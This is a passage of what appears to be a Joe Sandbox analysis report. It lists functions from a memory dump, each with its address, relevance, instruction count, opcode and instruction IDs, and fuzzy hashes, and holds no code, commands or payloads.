                                              • Instruction ID: 877abae32f08fbfab763296d209f8d9d2bd267f8cdc24a4fdbc39d8f69bfde85
                                              • Opcode Fuzzy Hash: 2043a4c62dede48f11b7bab77146506ed8771e9a6e81b211ba85b6555c384ecf
                                              • Instruction Fuzzy Hash: 2301C831B09B159BFBD4A7189448972B3D1EFA7311B144039D41EC3191ED25FC458380
                                              Function 00007FFAACCE88FD Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7d0eb61de9f3385871650a90c92149240406e0749e06dca3d7ccc4346986d8d
                                              • Instruction ID: 380663a157e8c5c064c9200598674dd6f8e89292ea9ee41a8bf1e6dd2d433245
                                              • Opcode Fuzzy Hash: b7d0eb61de9f3385871650a90c92149240406e0749e06dca3d7ccc4346986d8d
                                              • Instruction Fuzzy Hash: 680122A2D1E68E9FF7419B6C98650B9BFE0EF97205F4481B3D40CC6193EF24A64843D2
                                              Function 00007FFAACCF3310 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7f6cae7acdbea03ca11d633209132813a68845e1b9cdbd54ede0d69647df757
                                              • Instruction ID: d3e239bc1c3156633a2ece0cb4a78562cdf92177d4130a40d4ee81b19b5d0e10
                                              • Opcode Fuzzy Hash: e7f6cae7acdbea03ca11d633209132813a68845e1b9cdbd54ede0d69647df757
                                              • Instruction Fuzzy Hash: 7C11C66290E7CA9FE706EB3898555E87FB0EF46254B0C42F7D44CCA193DE24A5498381
                                              Function 00007FFAACCF8DD9 Relevance: .1, Instructions: 58COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efc9f633fd3441dbb1b47094b787bc603ce243ee8abf778905080da60734fd8c
                                              • Instruction ID: 01e91c2e4bc97816682fe398adbdd3b2d7d5b649f1a56d4a6906c49e4b4c5b4e
                                              • Opcode Fuzzy Hash: efc9f633fd3441dbb1b47094b787bc603ce243ee8abf778905080da60734fd8c
                                              • Instruction Fuzzy Hash: 5A01246188E3CA5FE3439B304C264E17FB0DE47214B0941E7E499CB4A3D9294A5AC3A3
                                              Function 00007FFAACD00328 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 17a7ed29e3c6e70de36ae4a3db3c7f1b0739bae0a92bdeab534fa595a33ec4cb
                                              • Instruction ID: 884d3c79a043a465c2b7e97ab4f2883ba78a8e57f42ed0fad527432defd121da
                                              • Opcode Fuzzy Hash: 17a7ed29e3c6e70de36ae4a3db3c7f1b0739bae0a92bdeab534fa595a33ec4cb
                                              • Instruction Fuzzy Hash: 3001289391D6915FE211B32CA8474F47F94EF8223470882FFE0DD8D093D548B44A43D5
                                              Function 00007FFAACCE426F Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a59835b53d862fa2610447d005b4d27b89498979af05f587b9064ae433f770ab
                                              • Instruction ID: b206838871f85e0a111d9d74b82c33bd11e3c29c80c9387def6f0802e7e16a37
                                              • Opcode Fuzzy Hash: a59835b53d862fa2610447d005b4d27b89498979af05f587b9064ae433f770ab
                                              • Instruction Fuzzy Hash: A2014E3290A94D8FEB04DF96AC401E57B94FF86334F04427AD41CC3081DB66D459C781
                                              Function 00007FFAACCF7230 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aad9113d89489f9e91ae272d5686c7f0885604bb9a673561e797b7a49ffad373
                                              • Instruction ID: 84a9fc8f449946db536215c2a6769aad87fef42d6269983fae5b6b162a144011
                                              • Opcode Fuzzy Hash: aad9113d89489f9e91ae272d5686c7f0885604bb9a673561e797b7a49ffad373
                                              • Instruction Fuzzy Hash: E801F2317099088BE388AB6DA88576173D2EBDD320F10417EE40EC7395D865EC8243C1
                                              Function 00007FFAACD2C150 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6092d51f5bfb15baa4dc2634160d172a60276de8cc80fcd283f99bff26c94f27
                                              • Instruction ID: 6ab7eba2d2bbf9997b92c78a4b12ea78e82ccfc37aacc895ebae45cae379d5ba
                                              • Opcode Fuzzy Hash: 6092d51f5bfb15baa4dc2634160d172a60276de8cc80fcd283f99bff26c94f27
                                              • Instruction Fuzzy Hash: D6115428A1DB958DF7B5936890453B267D0AF53308F0988ACD49D427C2DBDDF88E8395
                                              Function 00007FFAACD3CB48 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de34492609ba55645c137dfb5ccb50a485577a04ad1598a86d52b72dff1a0b92
                                              • Instruction ID: 3c01fe814969d9a8481a934639c3fc3dcf797c97dff21ca522d3673b5f4f4a5e
                                              • Opcode Fuzzy Hash: de34492609ba55645c137dfb5ccb50a485577a04ad1598a86d52b72dff1a0b92
                                              • Instruction Fuzzy Hash: 8101D860B0EB8A8FEB4A976844541B46BD1DF5720431881FBD41CC72E3D908DC098391
                                              Function 00007FFAACCEEAA4 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 288c1e85d4ee5b71119cb5d701dd655d3e245a6216f8a22fcd7c005deb0095f0
                                              • Instruction ID: 1dc517b6d3921132e8f7c72e984ef10f759849a80be75fabacdfecd1cf2890e4
                                              • Opcode Fuzzy Hash: 288c1e85d4ee5b71119cb5d701dd655d3e245a6216f8a22fcd7c005deb0095f0
                                              • Instruction Fuzzy Hash: A8F02B7150EA0D5EFB489B08EC16AF63B94FB47234F04002DF05EC1052D721E8A7C295
                                              Function 00007FFAACCF140D Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a08e76ced8c6f7878930952273265d809bfaf32d305f8406ee75db3cf447f7d8
                                              • Instruction ID: 927e59192fb2e76bc14560d5866dda270a7ad182fad11608acca3c3dc1c3f88d
                                              • Opcode Fuzzy Hash: a08e76ced8c6f7878930952273265d809bfaf32d305f8406ee75db3cf447f7d8
                                              • Instruction Fuzzy Hash: F001F53290EB460AF3259B3498004E67BD1EBD2264F4407BED195CB0F1EE18954E47C2
                                              Function 00007FFAACCE17E9 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 228d402b36e59f9c8f4f41fbf0ba467c28176e239682ee4697187951cf00fc9d
                                              • Instruction ID: 49e51a5bdcab0ae52cbc6f57ba7dd315beec5abb572246d94630474fdf823eb6
                                              • Opcode Fuzzy Hash: 228d402b36e59f9c8f4f41fbf0ba467c28176e239682ee4697187951cf00fc9d
                                              • Instruction Fuzzy Hash: 9A01D43150DB899FD785DB18D4605E6BBE1FF8A320F4445BEE089C7292CB24D944C7C2
                                              Function 00007FFAACCF062D Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6eae4a16ca9a3b6c0fc97fd0e83b35ba5bdedc3b77de8f36a77751c197a031a4
                                              • Instruction ID: 392d9a9d2a3d2d32b175644f5b7b2eccea49d2bc3eb8a5b8d1855e8128fd7064
                                              • Opcode Fuzzy Hash: 6eae4a16ca9a3b6c0fc97fd0e83b35ba5bdedc3b77de8f36a77751c197a031a4
                                              • Instruction Fuzzy Hash: 6601283250EB454BF3249B30C8159DA7BD1EBD2224F04477ED0998B1F1ED18E90D87C2
                                              Function 00007FFAACCE7CC0 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6af9ee034c63e52ffee1b9323a2e7f4c4380266865e7817fea830126583fbb3a
                                              • Instruction ID: a0f49630e555526b6460199728b2b49b99302e2b530e7bfddf98e99555aa066c
                                              • Opcode Fuzzy Hash: 6af9ee034c63e52ffee1b9323a2e7f4c4380266865e7817fea830126583fbb3a
                                              • Instruction Fuzzy Hash: 60F0AF72E1491D8EEB90EBA8D4066FD7BF4EF49300F0081B6E40DE3285DA38590147C0
                                              Function 00007FFAACCF5771 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 22f3e61a41a837ba43254ef11abdfebe882dc16f939e2eba4fb47756d31ce1d6
                                              • Instruction ID: 6588dc0bf9d549ef63c0a40784cd169c7ca7cd2ed7aa0d9ea32e74a37e72c0f9
                                              • Opcode Fuzzy Hash: 22f3e61a41a837ba43254ef11abdfebe882dc16f939e2eba4fb47756d31ce1d6
                                              • Instruction Fuzzy Hash: 94F0283190D7054FD704EB2494485667BE1EBAC361F04477FD40CC72B2EA34C6408781
                                              Function 00007FFAACCE1800 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 17406b2c5ef4cdbb42b0866d93c5fed3259ac4d69dbd7e3340d33e54d6f79cf5
                                              • Instruction ID: e7d1b4cbbb8383d9c471cd32a1502f4ddb249c3d07b7efce11d01e94d34cda87
                                              • Opcode Fuzzy Hash: 17406b2c5ef4cdbb42b0866d93c5fed3259ac4d69dbd7e3340d33e54d6f79cf5
                                              • Instruction Fuzzy Hash: 7EF0FF3260CB489BD788DB08D410AAAB7D2FBCA350F84453EF08EC3390CE24D84487C2
                                              Function 00007FFAACCFA090 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67600269a5750f74bb86b9be1dd6d8e04fbf715b2cf1c33dd50a0ca258c424e9
                                              • Instruction ID: 5d8ebc320dfb37366f177c33cceba7b17c96cc6397d57587fd27053b650ca766
                                              • Opcode Fuzzy Hash: 67600269a5750f74bb86b9be1dd6d8e04fbf715b2cf1c33dd50a0ca258c424e9
                                              • Instruction Fuzzy Hash: 25F08130A19E1A8FEAA9D73480447B2B2E1FF59310F508478D06EC7184CE28E88B8780
                                              Function 00007FFAACCFEB68 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3655602d3aa5be7a40522ec3c1d0cd92770dd74b2a4ae1110217e183eeae26c2
                                              • Instruction ID: 573db2ce1dd83a2a368a222942a7bb943132934468be736114892089e1b2fce1
                                              • Opcode Fuzzy Hash: 3655602d3aa5be7a40522ec3c1d0cd92770dd74b2a4ae1110217e183eeae26c2
                                              • Instruction Fuzzy Hash: 22F0F031208A0C9FDB80EB18E8049A673D1FBC4311F40467AE84EE7264DA29E985C7C2
                                              Function 00007FFAACCF15A0 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 922ca04d982b7e895aa7255ed2edcc2f4b3b3479908d964a3e17b7466be58de8
                                              • Instruction ID: 9470715802698a95589520fcabc80002eee733d648f148490ce3b0666bd7026f
                                              • Opcode Fuzzy Hash: 922ca04d982b7e895aa7255ed2edcc2f4b3b3479908d964a3e17b7466be58de8
                                              • Instruction Fuzzy Hash: 35F0687193CB058AF790FF38850967AB6D0FF89319F044A7BA88DD2165EE28D58446C2
                                              Function 00007FFAACCF5790 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9cd134b849545177a40d37b2b7a28028a01b71ba6fc580c5c9456b97b21b735
                                              • Instruction ID: 609a7b45f2daed120388786b52e149a62ffa4f031900b544e9e761c680578390
                                              • Opcode Fuzzy Hash: b9cd134b849545177a40d37b2b7a28028a01b71ba6fc580c5c9456b97b21b735
                                              • Instruction Fuzzy Hash: FAF0F631608B044BEB04EB28A8886AA7BD5D7ED361F14473BE80CC32B4DD34C28047C6
                                              Function 00007FFAACD3DF90 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d25ff9846dffa3e10748e0120bdf10e9d4000bdceeac27c07541e5013239973
                                              • Instruction ID: 98f1b5ceadbe0084052e98629504ef6e3019ce28a101a6169748e0e6ad87165a
                                              • Opcode Fuzzy Hash: 9d25ff9846dffa3e10748e0120bdf10e9d4000bdceeac27c07541e5013239973
                                              • Instruction Fuzzy Hash: C1F0E221B1AA5A8FEBA8D76CB89477476D1EF4A32270440FBE01ECB295DA14CC4987C0
                                              Function 00007FFAACD34778 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8572b0c499f7db0064676d2c688e4d7a933bf30df70e1d373ddd2c36019e65aa
                                              • Instruction ID: 81c2611d07d3db2cd57e2735698c4f38b1620aeffc2295e5ad665a34e5612c76
                                              • Opcode Fuzzy Hash: 8572b0c499f7db0064676d2c688e4d7a933bf30df70e1d373ddd2c36019e65aa
                                              • Instruction Fuzzy Hash: 13F04F2471A90ECFEE84EB2CC85492077E0FF2930476485B8D01ECB295EB16EC4AC790
                                              Function 00007FFAACCF5709 Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68a78d4f022008ee15815793847601d5c996776d41515e740ee1d3bda828f5cb
                                              • Instruction ID: 01a91113948e20a33957b776a7d4e701f2e207d8d06b7be41737eb4405bbc18f
                                              • Opcode Fuzzy Hash: 68a78d4f022008ee15815793847601d5c996776d41515e740ee1d3bda828f5cb
                                              • Instruction Fuzzy Hash: 72F0967192DB058BF740FB38940557AB6D4FF89319F044A7BA88DD21A5EE28DA8446C2
                                              Function 00007FFAACD34798 Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d17d44aea68cb9bb8d3bc0a379984a5d191bd51b15373c8bfb8026d8a1a85758
                                              • Instruction ID: 0b024845d62544d33226f0d09ac4c00806c2ffe29c58c43ba2c00a81799b80e5
                                              • Opcode Fuzzy Hash: d17d44aea68cb9bb8d3bc0a379984a5d191bd51b15373c8bfb8026d8a1a85758
                                              • Instruction Fuzzy Hash: 0BF05C3170E6058AFE64132A5C4C77137C4DF56291F140576D45CC2290EA19E485C3D0
                                              Function 00007FFAACCF6F39 Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7402449a4ae1513d2afc9ab9718a051de6048f6e0bcdd31d24f170b47b847a13
                                              • Instruction ID: a731f2d1fc8799a48b1ee4c1b7f5dc5a4bb9f73706d04b0018a1f6d893b82e5f
                                              • Opcode Fuzzy Hash: 7402449a4ae1513d2afc9ab9718a051de6048f6e0bcdd31d24f170b47b847a13
                                              • Instruction Fuzzy Hash: 86F0F661C1D78D8FE752EB3488251E8BF71EF16200F4500E7D009C71A3EA249948C392
                                              Function 00007FFAACCF7060 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba484474af0e368160c8b5755252550ab111f602710d4bfb308e4b60d72537f7
                                              • Instruction ID: 06b50b460bdee755197a5cce9a6c7262dbbd8838b41716a6f4d2b34a3436a634
                                              • Opcode Fuzzy Hash: ba484474af0e368160c8b5755252550ab111f602710d4bfb308e4b60d72537f7
                                              • Instruction Fuzzy Hash: 50F0B401A4DB6655F7B5577924453BA6DC0AB12310F4854B5D8ADC56C1DA4CF8CA83C1
                                              Function 00007FFAACCF816B Relevance: .0, Instructions: 34COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ff916f86b3dde5c8efae700fe2df4160caf92b72d61c42837ef52381465c3e8
                                              • Instruction ID: 03ff1c0f3a257a3810e1f3d866f4775b1e39cd6a1642c832be4fe4a4dc805ced
                                              • Opcode Fuzzy Hash: 9ff916f86b3dde5c8efae700fe2df4160caf92b72d61c42837ef52381465c3e8
                                              • Instruction Fuzzy Hash: 57E0DF12B2AE1E47775863AE24891BA85C9CBEA22575481B7E40CC2395DE488C4A82D0
                                              Function 00007FFAACD03B60 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ed4be96b35d1c97ea4fb1fe368840198574f3d514574a5e20654148d663b853
                                              • Instruction ID: ecbfbfb85285a21b396a841782d0eebc5270e8a8759666b730e118012ce4cac1
                                              • Opcode Fuzzy Hash: 1ed4be96b35d1c97ea4fb1fe368840198574f3d514574a5e20654148d663b853
                                              • Instruction Fuzzy Hash: 78E0653072581A56F69CA72C9444AB96191EF85311B94867DE41DC32C9D918EC8643C4
                                              Function 00007FFAACCE1A80 Relevance: .0, Instructions: 30COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 288ee4f7118941034b3fd1d56a0347a7d4db629add25fe7f8d2fae07ddf6e3ed
                                              • Instruction ID: d491c146f9cbec05c625568754d6b53da873fa660cd21d0ea9c2aca8faec563f
                                              • Opcode Fuzzy Hash: 288ee4f7118941034b3fd1d56a0347a7d4db629add25fe7f8d2fae07ddf6e3ed
                                              • Instruction Fuzzy Hash: 6FE06872918B4C8BEB40AB58A8009E83BA0EB86314F040069E01DC3182C72599A8C392
                                              Function 00007FFAACD2A0D0 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c762591e9282795d9f0968a79ca8762a68f25aa559b5d1f75c9cdfacea0c1b62
                                              • Instruction ID: fb31c0fc27d1a84ec134770c947b4a224fc6b89ca0b94ff890b5c2ac6c729e2b
                                              • Opcode Fuzzy Hash: c762591e9282795d9f0968a79ca8762a68f25aa559b5d1f75c9cdfacea0c1b62
                                              • Instruction Fuzzy Hash: 70E0C230715C1E8F9AD4E71CA84467532D5EFC932034941B3E40CC3258DD54CC4183C0
                                              Function 00007FFAACD21410 Relevance: .0, Instructions: 27COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f3d694713b500a38bddcd936cb2055e52caed04a9d3b0f420d3aa705503fa5b
                                              • Instruction ID: 98e69b94e0c5181896c5262557f7267baae997dad768e0eec84c106b69909cef
                                              • Opcode Fuzzy Hash: 9f3d694713b500a38bddcd936cb2055e52caed04a9d3b0f420d3aa705503fa5b
                                              • Instruction Fuzzy Hash: EFE08630715F099FA7B5EB3D4448A3271D6FFA9305710457D901DC3251ED35D846C380
                                              Function 00007FFAACCE0CFD Relevance: .0, Instructions: 25COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 087f7911bde95226f1ac1a97249247ffe9f5ab612773ea7d3321f4380e87cc21
                                              • Instruction ID: 49e646974c0c75c4c31806f71dbd78137de05d5aad15a95594cdffedb4c27dec
                                              • Opcode Fuzzy Hash: 087f7911bde95226f1ac1a97249247ffe9f5ab612773ea7d3321f4380e87cc21
                                              • Instruction Fuzzy Hash: F9E01261F5981E89FA44F7B4A81A9FDF256DF8A204FC058B5E41EC2083CF5C651946C1
                                              Function 00007FFAACCE09AD Relevance: .0, Instructions: 25COMMON
                                              Download Yara Rule
